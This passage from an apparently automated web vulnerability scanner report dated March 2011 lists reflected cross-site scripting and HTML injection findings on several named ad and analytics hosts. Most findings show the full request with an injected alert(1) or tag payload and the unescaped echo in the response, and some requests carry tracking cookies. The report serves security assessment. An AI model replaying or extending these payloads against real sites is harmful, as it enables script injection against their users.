GET /PortalServe/?pid=1211727V27020110211005352&time=0|19:14|-6c9305"%3balert(1)//021a273d1f6&redir=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBGqZZMDF0Tb29HtOT6Qb229CjDbyUpt0BAAAAEAEgADgAWISHq-sXYMmGo4fUo4AQggEXY2EtcHViLTYwODUxODUxOTY5MzUyMDeyARh3d3cuZGNsay1kZWZhdWx0LXJlZi5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy5kY2xrLWRlZmF1bHQtcmVmLmNvbS_gAQOYAsA-wAIC4AIA6gImNjQ2MS9BcnRpc3RfQk9BL0FydGlzdF9CT0FfdG9wXzMwMHgyNTD4AvDRHpADpAOYA6QDqAMB4AQB%26num%3D0%26sig%3DAGiWqtxHLHtm8jZ8cA47khaDSdYjnTNfyA%26client%3Dca-pub-6085185196935207%26adurl%3D$CTURL$&r=0.2464489964348231 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.pointroll.com
Cookie: PRbu=EndWiNPUY; PRgo=BBBAAsJvBBVBF4FR; PRID=0BF6CA2A-ACDA-40B6-B452-CC8B2E882F48; PRvt=CBJcgEndWiNPUY!AgBBe; PRimp=D59D0400-34A2-18F5-1309-720000200101; PRca=|AKEA*263:1|#; PRcp=|AKEAAAEP:1|#; PRpl=|FFCo:1|#; PRcr=|GEHc:1|#; PRpc=|FFCoGEHc:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 07 Mar 2011 01:31:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr1211727' src='http://ads.pointroll.com/PortalServe/?pid=1211727V27020110211005352&cid=1443399&pos=h&redir=http://adclick.g.doubleclick.net/aclk%3Fsa=L%26ai=BGqZZMDF0Tb
...[SNIP]...
AIC4AIA6gImNjQ2MS9BcnRpc3RfQk9BL0FydGlzdF9CT0FfdG9wXzMwMHgyNTD4AvDRHpADpAOYA6QDqAMB4AQB%26num=0%26sig=AGiWqtxHLHtm8jZ8cA47khaDSdYjnTNfyA%26client=ca-pub-6085185196935207%26adurl=$CTURL$&time=0|19:14|-6c9305";alert(1)//021a273d1f6&r=0.2464489964348231&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

1.42. http://ak.quantcast.com/css/ie6.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /css/ie6.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cca77"><a>c294b5ef411 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /csscca77"><a>c294b5ef411/ie6.css HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1299428974.1299459319.5; __utmc=14861494; __utmb=14861494.4.8.1299459320199; __qca=P0-1138661367-1297862290557;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Tue, 08 Mar 2011 12:00:57 GMT
Content-Length: 7345
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" csscca77"><a>c294b5ef411 ie6.css" />
...[SNIP]...

1.43. http://ak.quantcast.com/css/ie6.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /css/ie6.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 494db"><a>6e7eb28cf72 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /css/ie6.css494db"><a>6e7eb28cf72 HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1299428974.1299459319.5; __utmc=14861494; __utmb=14861494.4.8.1299459320199; __qca=P0-1138661367-1297862290557;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Tue, 08 Mar 2011 12:01:06 GMT
Content-Length: 17333
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" css ie6.css494db"><a>6e7eb28cf72" />
...[SNIP]...

1.44. http://ak.quantcast.com/css/ie7.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /css/ie7.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48324"><a>c25c764c259 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /css48324"><a>c25c764c259/ie7.css HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1299428974.1299459319.5; __utmc=14861494; __utmb=14861494.4.8.1299459320199; __qca=P0-1138661367-1297862290557;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Tue, 08 Mar 2011 12:00:58 GMT
Content-Length: 7345
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" css48324"><a>c25c764c259 ie7.css" />
...[SNIP]...

1.45. http://ak.quantcast.com/css/ie7.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /css/ie7.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aed0b"><a>317e5feaa62 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /css/ie7.cssaed0b"><a>317e5feaa62 HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1299428974.1299459319.5; __utmc=14861494; __utmb=14861494.4.8.1299459320199; __qca=P0-1138661367-1297862290557;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Tue, 08 Mar 2011 12:01:06 GMT
Content-Length: 17337
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" css ie7.cssaed0b"><a>317e5feaa62" />
...[SNIP]...

1.46. http://ak.quantcast.com/dynamic-css/screen-optimized.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /dynamic-css/screen-optimized.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ad56"><a>19b70861037 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dynamic-css3ad56"><a>19b70861037/screen-optimized.css HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1299428974.1299459319.5; __utmc=14861494; __utmb=14861494.4.8.1299459320199; __qca=P0-1138661367-1297862290557;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Tue, 08 Mar 2011 12:01:09 GMT
Content-Length: 7366
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" dynamic-css3ad56"><a>19b70861037 screen-optimized.css" />
...[SNIP]...

1.47. http://ak.quantcast.com/dynamic-css/screen-optimized.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /dynamic-css/screen-optimized.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15e9d"><a>c0abe3b0a1c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dynamic-css/screen-optimized.css15e9d"><a>c0abe3b0a1c HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1299428974.1299459319.5; __utmc=14861494; __utmb=14861494.4.8.1299459320199; __qca=P0-1138661367-1297862290557;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Tue, 08 Mar 2011 12:01:14 GMT
Content-Length: 7366
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" dynamic-css screen-optimized.css15e9d"><a>c0abe3b0a1c" />
...[SNIP]...

1.48. http://ak.quantcast.com/js/concat.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /js/concat.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db870"><a>fdae50e431d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /jsdb870"><a>fdae50e431d/concat.js HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1299428974.1299459319.5; __utmc=14861494; __utmb=14861494.4.8.1299459320199; __qca=P0-1138661367-1297862290557;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Tue, 08 Mar 2011 12:01:10 GMT
Content-Length: 7346
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" jsdb870"><a>fdae50e431d concat.js" />
...[SNIP]...

1.49. http://ak.quantcast.com/js/concat.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /js/concat.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2875a"><a>d3812daf843 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /js/concat.js2875a"><a>d3812daf843 HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1299428974.1299459319.5; __utmc=14861494; __utmb=14861494.4.8.1299459320199; __qca=P0-1138661367-1297862290557;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Tue, 08 Mar 2011 12:01:18 GMT
Content-Length: 15188
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" js concat.js2875a"><a>d3812daf843" />
...[SNIP]...

1.50. http://api-public.addthis.com/url/shares.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api-public.addthis.com
Path:   /url/shares.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 1ac8a<script>alert(1)</script>d2fe5350c6d was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /url/shares.json?url=http%3A%2F%2Fwww.metrolyrics.com%2F&callback=_ate.cbs.sc_httpwwwmetrolyricscom1ac8a<script>alert(1)</script>d2fe5350c6d HTTP/1.1
Host: api-public.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.metrolyrics.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1299423599.1FE|1299423435.60|1297806627.66; uit=1; dt=X; uid=4d5af32c71c2e1a5; psc=6

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=300
Content-Type: application/javascript;charset=UTF-8
Date: Mon, 07 Mar 2011 00:56:15 GMT
Content-Length: 91
Connection: close

_ate.cbs.sc_httpwwwmetrolyricscom1ac8a<script>alert(1)</script>d2fe5350c6d({"shares":835});

1.51. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload ec0bc<script>alert(1)</script>d87256e279b was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=8dn4jnyemg4ky9svqgs28wdsec0bc<script>alert(1)</script>d87256e279b&admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d&callback_url=http%3A%2F%2Ftag%2Eadmeld%2Ecom%2Fpixel%3Fadmeld%5Fdataprovider%5Fid%3D4 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_300_TOP&groupid=8308787085&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=a1177894-f476-4957-80ae-6dca795c7582; BizoData=bCKmweipCYuVeaSOoxswed9Qb1MaQBj6W9sWr87GbT1F2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYRQ5ASb5kMise8Pxt51dGGWc8QDWgjPLhdOG36lSisWrtgLaaSVnj2fdRBcVnCpgzxiiGG36lSisWrtgKQAGh0CtrorNnZzJ6mTbYtlIspvrRHB8bzYus0MO9AJQ9klML90GpK80xK9r5TpCeAipqZpPwjKnistQch1TtSdCipN6mK3CUii1HWejxSM8P3E9CsIyx2KVipBsQrpnSjb2ENNS7GUK75TS3bJ0RsLv7isbmBSYVr2mcVbHisJ6ipYWnnQcsOceLYL7xBRFxKFdLqmZqVuCxNVxR9ESVdFipXOuvVwW11pRw3kybarrhisjKIfUU0elPDSis2guzkT2eqhlmJEDBn8LipG8voHPDPbDLax1KKSKoPv3akGJg07Xisj9z1YKu1NBis8T7j4VRMZDSux1LRdbvQME7fb528daHNJfkisPgGK2RSvdeUD9bvQME7fb520g33buvrQmtDwJR0SvlcgxOZOtWnisXSxxMhQn4sBPBisTo4YEiiYHam60Lr24SUTAXbskI6KiiPUqFH1r2Q7eRaFl39q8flhoInmtRaNDMdjO4e7XqdIDERIqPwhcbmvmZOisnclRRmEpGr0KwjLHYpX4NWnck1gtWcIXXLqdtszoE70KwjLHYpX4F8pJFEZG8Dt2Pkc1sv6c5ZV6jeN2HpSfUPZJTCisdBqSvNMSvaipU6QngPqmaT8Iyp5qkRIUt1qGDVcfhLmRsZN0mIUUYBnO5VrNlR3nLMBjv5Kebnoduipu3siiUTre1TcZmx61isSNkyistxBvtcbxUrwAipNN9QFd9eD26isip5kQtBufiibtDMd597JLLch9l6mETTwUEiiPsHLVMTFNsVrcrw312KlSryiiippLvHRWwTxBUSFRuufykhwWSlghzjIvVLoBhj5NDTHr2wr1kiiqD792pBiiZisWoLipipOUKipZHRipYhdFhisisWA5B16a2n9eG5TUT1qeCdvJtyU5Mwis1R9XDEmr4jQn0xip0wxgMqQ3dfX5RnYEo6pZ59VsULAqst2zss8e5HZ4551FBngKH7AQJipLd4ekU1f7MrQxrTtB1Wxn268X1nippZxuFiiipNVtwB9MTZe7RE8f0iiJGJJOisFTGPnsMVZAvvYDODnXavvaWQgiszEc0Q0ChKpQiiHyBP6e0UwPekkdYKGOaFvC2QlLeG1tBOXsjWJGU6RQpSM5WNTMfafI0saipfrtrZCipo8J7yKXisxNzbgXQvQ3ldWQZHY4kmra7WMngtuLhwCjTiioIip4aU3X1MNZy9nc9A8jsKZSw8DO8jmWc9UzGfccMWY4JCgIlY6fU8ucsHAie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 07 Mar 2011 01:39:55 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 84
Connection: keep-alive

Unknown API key: (8dn4jnyemg4ky9svqgs28wdsec0bc<script>alert(1)</script>d87256e279b)

1.52. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the callback_url request parameter is copied into the HTML document as plain text between tags. The payload 5c7fd<script>alert(1)</script>bf08636ce95 was submitted in the callback_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=8dn4jnyemg4ky9svqgs28wds&admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d&callback_url=5c7fd<script>alert(1)</script>bf08636ce95 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_300_TOP&groupid=8308787085&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=a1177894-f476-4957-80ae-6dca795c7582; BizoData=...[SNIP]...

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 07 Mar 2011 01:41:04 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 58
Connection: keep-alive

Unknown Referer: 5c7fd<script>alert(1)</script>bf08636ce95

1.53. http://api.dimestore.com/viapi [id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.dimestore.com
Path:   /viapi

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload b0c8a<a>3637f5c2d52 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /viapi?action=pixel&id=f9622925b0c8a<a>3637f5c2d52 HTTP/1.1
Host: api.dimestore.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_300_TOP&groupid=5332614444&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pixel_d51770430=1

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Mon, 07 Mar 2011 00:59:52 GMT
Content-Type: text/xml
Connection: keep-alive
Set-Cookie: pixel_f9622925b0c8a<a>3637f5c2d52=1; Expires=Tue, 06-Mar-2012 00:59:52 GMT
Content-Length: 54

// DIMESTORE PIXEL OK -- f9622925b0c8a<a>3637f5c2d52

1.54. http://ar.voicefive.com/b/rc.pli [func parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload f092f<script>alert(1)</script>49bca32207c was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteractionf092f<script>alert(1)</script>49bca32207c&n=ar_int_p84053757&1299459393565 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=Homepage&placement=MW_HOME_300_TOP&groupid=5557007329&quantseg=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p58096422=exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&; ar_p39750809=exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&; ar_p81479006=exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&; ar_p84053757=exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&; BMX_3PC=1; UID=2206bdab-24.143.206.75-1298208201; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 00:55:55 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteractionf092f<script>alert(1)</script>49bca32207c("");

1.55. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload c534e<script>alert(1)</script>d15bf7170c1 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8c534e<script>alert(1)</script>d15bf7170c1&c2=6135404&c3=15&c4=12005&c5=&c6=&c10=3212813&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7469/12005/20615-9.html?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Mar 2011 01:47:03 GMT
Date: Mon, 07 Mar 2011 01:47:03 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
